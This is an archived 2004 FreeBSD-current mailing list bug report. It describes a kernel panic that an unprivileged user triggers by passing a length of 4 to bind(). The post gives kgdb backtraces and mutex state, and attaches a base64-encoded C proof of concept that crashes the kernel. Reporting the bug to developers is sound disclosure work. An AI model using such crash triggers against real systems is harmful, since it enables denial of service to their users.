From owner-freebsd-current@FreeBSD.ORG Sat Apr 3 13:21:08 2004 Return-Path: Delivered-To: freebsd-current@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 877BB16A4D3 for ; Sat, 3 Apr 2004 13:21:08 -0800 (PST) Received: from mailserv1.neuroflux.com (mailserv1.neuroflux.com [204.228.228.92]) by mx1.FreeBSD.org (Postfix) with ESMTP id 358C143D3F for ; Sat, 3 Apr 2004 13:21:08 -0800 (PST) (envelope-from ryans@gamersimpact.com) Received: (qmail 88745 invoked by uid 89); 3 Apr 2004 21:21:08 -0000 Received: from unknown (HELO www2.neuroflux.com) (127.0.0.1) by localhost with SMTP; 3 Apr 2004 21:21:08 -0000 Received: from 65.103.5.228 (SquirrelMail authenticated user ryans@gamersimpact.com) by www2.neuroflux.com with HTTP; Sat, 3 Apr 2004 14:21:08 -0700 (MST) Message-ID: <49165.65.103.5.228.1081027268.squirrel@www2.neuroflux.com> Date: Sat, 3 Apr 2004 14:21:08 -0700 (MST) From: "Ryan Sommers" To: current@freebsd.org User-Agent: SquirrelMail/1.4.2 MIME-Version: 1.0 Content-Type: multipart/mixed;boundary="----=_20040403142108_17620" X-Priority: 3 Importance: Normal Subject: Panic from bad length parameter in bind (Possible DOS attack) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 03 Apr 2004 21:21:08 -0000 ------=_20040403142108_17620 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit Whenever I supply a length of 4 as the final bind parameter I get the following panic. Looks like bind returns fine, however, when the program exits it stumbles over some mutex associated with the descriptor. The mutex passed to mtx_destroy() has MTX_RECURSED set. I attempted to find where the call to bind was clobbering the mutex but couldn't. I attached the simple program to exploit this. I was able to do it as a regular user. panic: Assertion (m->mtx_lock & (MTX_RECURSED|MTX_CONTESTED)) == 0 failed at /usr/src/sys/kern/kern_mutex.c:848 panic messages: --- panic: Assertion (m->mtx_lock & (MTX_RECURSED|MTX_CONTESTED)) == 0 failed at /usr/src/sys/kern/kern_mutex.c:848 at line 848 in file /usr/src/sys/kern/kern_mutex.c Debugger("panic") Dumping 511 MB 16 32 48 64 80 96 112 128 144 160 176 192 208 224 240 256 272 288 304 320 336 352 368 384 400 416 432 448 464 480 496 --- Reading symbols from /boot/kernel/radeon.ko...done. Loaded symbols for /boot/kernel/radeon.ko Reading symbols from /boot/kernel/acpi.ko...done. Loaded symbols for /boot/kernel/acpi.ko Reading symbols from /usr/obj/usr/src/sys/LILSHADOW/modules/usr/src/sys/modules/linux/linux.ko.debug...done. Loaded symbols for /usr/obj/usr/src/sys/LILSHADOW/modules/usr/src/sys/modules/linux/linux.ko.debug #0 doadump () at /usr/src/sys/kern/kern_shutdown.c:240 240 dumping++; (kgdb) bt #0 doadump () at /usr/src/sys/kern/kern_shutdown.c:240 #1 0xc042b962 in db_fncall (dummy1=0, dummy2=0, dummy3=-1067086860, dummy4=0xdc56f924 " ìfÀXùVÜ\026\032[ÀXùVÜ\203\032[À\220\a") at /usr/src/sys/ddb/db_command.c:551 #2 0xc042b768 in db_command (last_cmdp=0xc0645640, cmd_table=0x0, aux_cmd_tablep=0xc0615ef0, aux_cmd_tablep_end=0xc0615ef4) at /usr/src/sys/ddb/db_command.c:348 #3 0xc042b848 in db_command_loop () at /usr/src/sys/ddb/db_command.c:475 #4 0xc042dfdd in db_trap (type=3, code=0) at /usr/src/sys/ddb/db_trap.c:73 #5 0xc05b7d41 in kdb_trap (type=3, code=0, regs=0xdc56fa50) at /usr/src/sys/i386/i386/db_interface.c:172 #6 0xc05c7b0c in trap (frame= {tf_fs = -1067515880, tf_es = -1068695536, tf_ds = 16, tf_edi = 1, tf_esi = -1067469665, tf_ebp = -598279532, tf_isp = -598279556, tf_ebx = 0, tf_edx = 0, tf_ecx = -1061076992, tf_eax = 18, tf_trapno = 3, tf_err = 0, tf_eip = -1067745359, tf_cs = 8, tf_eflags = 662, tf_esp = -598279480, tf_ss = -598279500}) at /usr/src/sys/i386/i386/trap.c:579 #7 0xc05b7fb1 in Debugger (msg=0xc05fc09b "panic") at machine/cpufunc.h:60 #8 0xc04bec03 in __panic (file=0xc05fb46e "/usr/src/sys/kern/kern_mutex.c", line=848, fmt=0xc05fb49f "Assertion %s failed at %s:%d") at /usr/src/sys/kern/kern_shutdown.c:536 #9 0xc04b7706 in mtx_destroy (m=0x0) at /usr/src/sys/kern/kern_mutex.c:848 #10 0xc052b554 in in_pcbdetach (inp=0xc4257ca8) at /usr/src/sys/netinet/in_pcb.c:697 #11 0xc053807a in tcp_close (tp=0x0) at /usr/src/sys/netinet/tcp_subr.c:746 #12 0xc053c152 in tcp_disconnect (tp=0xc42598b8) at /usr/src/sys/netinet/tcp_usrreq.c:1251 #13 0xc053b164 in tcp_usr_detach (so=0x0) at /usr/src/sys/netinet/tcp_usrreq.c:179 #14 0xc04f0d0c in soclose (so=0xc4238e10) at /usr/src/sys/kern/uipc_socket.c:380 #15 0xc04e3cea in soo_close (fp=0x0, td=0xc41b2690) at /usr/src/sys/kern/sys_socket.c:244 #16 0xc04a7c7f in fdrop_locked (fp=0xc41dc7f8, td=0xc41b2690) at /usr/src/sys/sys/file.h:292 #17 0xc04a7078 in fdrop (fp=0xc41dc7f8, td=0xc41b2690) at /usr/src/sys/kern/kern_descrip.c:1883 #18 0xc04a704b in closef (fp=0xc41dc7f8, td=0xc41b2690) at /usr/src/sys/kern/kern_descrip.c:1869 #19 0xc04a68f3 in fdfree (td=0xc41b2690) at /usr/src/sys/kern/kern_descrip.c:1586 #20 0xc04abf73 in exit1 (td=0xc41b2690, rv=-256) at /usr/src/sys/kern/kern_exit.c:253 #21 0xc04abb14 in exit1 (td=0xc41b2690, rv=277) at /usr/src/sys/kern/kern_exit.c:98 #22 0xc05c8277 in syscall (frame= {tf_fs = 47, tf_es = 47, tf_ds = 47, tf_edi = -1077940988, tf_esi = -1077940980, tf_---Type to continue, or q to quit--- ebp = -1077941044, tf_isp = -598278796, tf_ebx = 672344908, tf_edx = 672417764, tf_ecx = 671526944, tf_eax = 1, tf_trapno = 12, tf_err = 2, tf_eip = 671871511, tf_cs = 31, tf_eflags = 662, tf_esp = -1077941072, tf_ss = 47}) at /usr/src/sys/i386/i386/trap.c:1004 #23 0x280bf217 in ?? () ---Can't read userspace from dump, or kernel process--- (kgdb) up 10 #10 0xc052b554 in in_pcbdetach (inp=0xc4257ca8) at /usr/src/sys/netinet/in_pcb.c:697 697 INP_LOCK_DESTROY(inp); (kgdb) list 692 } 693 if (inp->inp_options) 694 (void)m_free(inp->inp_options); 695 ip_freemoptions(inp->inp_moptions); 696 inp->inp_vflag = 0; 697 INP_LOCK_DESTROY(inp); 698 #ifdef MAC 699 mac_destroy_inpcb(inp); 700 #endif 701 uma_zfree(ipi->ipi_zone, inp); (kgdb) print inp->inp_mtx $1 = {mtx_object = {lo_class = 0xc062933c, lo_name = 0xc060548b "inp", lo_type = 0xc06064c4 "tcpinp", lo_flags = 4915200, lo_list = {tqe_next = 0x0, tqe_prev = 0x0}, lo_witness = 0x0}, mtx_lock = 3290113681, mtx_recurse = 1} (kgdb) print *inp $2 = {inp_hash = {le_next = 0x0, le_prev = 0x0}, inp_list = {le_next = 0xc4258000, le_prev = 0xc0655f7c}, inp_flow = 0, inp_inc = {inc_flags = 0 '\0', inc_len = 0 '\0', inc_pad = 0, inc_ie = {ie_fport = 0, ie_lport = 0, ie_dependfaddr = {ie46_foreign = {ia46_pad32 = {0, 0, 0}, ia46_addr4 = { s_addr = 0}}, ie6_foreign = {__u6_addr = { __u6_addr8 = '\0' , __u6_addr16 = {0, 0, 0, 0, 0, 0, 0, 0}, __u6_addr32 = {0, 0, 0, 0}}}}, ie_dependladdr = {ie46_local = { ia46_pad32 = {0, 0, 0}, ia46_addr4 = {s_addr = 0}}, ie6_local = {__u6_addr = { __u6_addr8 = '\0' , __u6_addr16 = {0, 0, 0, 0, 0, 0, 0, 0}, __u6_addr32 = {0, 0, 0, 0}}}}}}, inp_ppcb = 0x0, inp_pcbinfo = 0xc0655f80, inp_socket = 0xc4238e10, inp_label = 0x0, inp_flags = 0, inp_sp = 0x0, inp_vflag = 0 '\0', inp_ip_ttl = 64 '@', inp_ip_p = 0 '\0', inp_depend4 = {inp4_ip_tos = 0 '\0', inp4_options = 0x0, inp4_moptions = 0x0}, inp_depend6 = {inp6_options = 0x0, inp6_outputopts = 0x0, inp6_moptions = 0x0, inp6_icmp6filt = 0x0, inp6_cksum = 0, inp6_ifindex = 0, inp6_hops = 0}, inp_portlist = {le_next = 0x0, le_prev = 0x0}, inp_phd = 0x0, inp_gencnt = 13, inp_mtx = {mtx_object = {lo_class = 0xc062933c, lo_name = 0xc060548b "inp", lo_type = 0xc06064c4 "tcpinp", lo_flags = 4915200, lo_list = {tqe_next = 0x0, tqe_prev = 0x0}, lo_witness = 0x0}, mtx_lock = 3290113681, mtx_recurse = 1}} (kgdb) down #9 0xc04b7706 in mtx_destroy (m=0x0) at /usr/src/sys/kern/kern_mutex.c:848 848 MPASS((m->mtx_lock & (MTX_RECURSED|MTX_CONTESTED)) == 0); (kgdb) list 843 LOCK_LOG_DESTROY(&m->mtx_object, 0); 844 845 if (!mtx_owned(m)) 846 MPASS(mtx_unowned(m)); 847 else { 848 MPASS((m->mtx_lock & (MTX_RECURSED|MTX_CONTESTED)) == 0); 849 850 /* Tell witness this isn't locked to make it happy. */ 851 WITNESS_UNLOCK(&m->mtx_object, LOP_EXCLUSIVE, __FILE__, 852 __LINE__); (kgdb) info args m = (struct mtx *) 0x0 (kgdb) info locals No locals. (kgdb) up #10 0xc052b554 in in_pcbdetach (inp=0xc4257ca8) at /usr/src/sys/netinet/in_pcb.c:697 697 INP_LOCK_DESTROY(inp); (kgdb) info args inp = (struct inpcb *) 0xc4257ca8 (kgdb) info locals so = (struct socket *) 0xc4238e10 ipi = (struct inpcbinfo *) 0xc0655f80 (kgdb) quit -- Ryan "leadZERO" Sommers Gamer's Impact President ryans@gamersimpact.com ICQ: 1019590 AIM/MSN: leadZERO -= http://www.gamersimpact.com =- ------=_20040403142108_17620 Content-Type: application/octet-stream; name="serv.c" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="serv.c" I2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzeXMvc29ja2V0Lmg+CiNpbmNsdWRlIDxuZXRp bmV0L2luLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4KCmludAptYWluKCkKewoJc3RydWN0IHNv Y2thZGRyX2luIHNlcnZzYWRkcjsKCWludCBmZDsKCglmZD1zb2NrZXQoQUZfSU5FVCwgU09DS19T VFJFQU0sIDApOwoJYmluZChmZCwgKHN0cnVjdCBzb2NrYWRkciAqKSZzZXJ2c2FkZHIsIDQpOwp9 Cg== ------=_20040403142108_17620--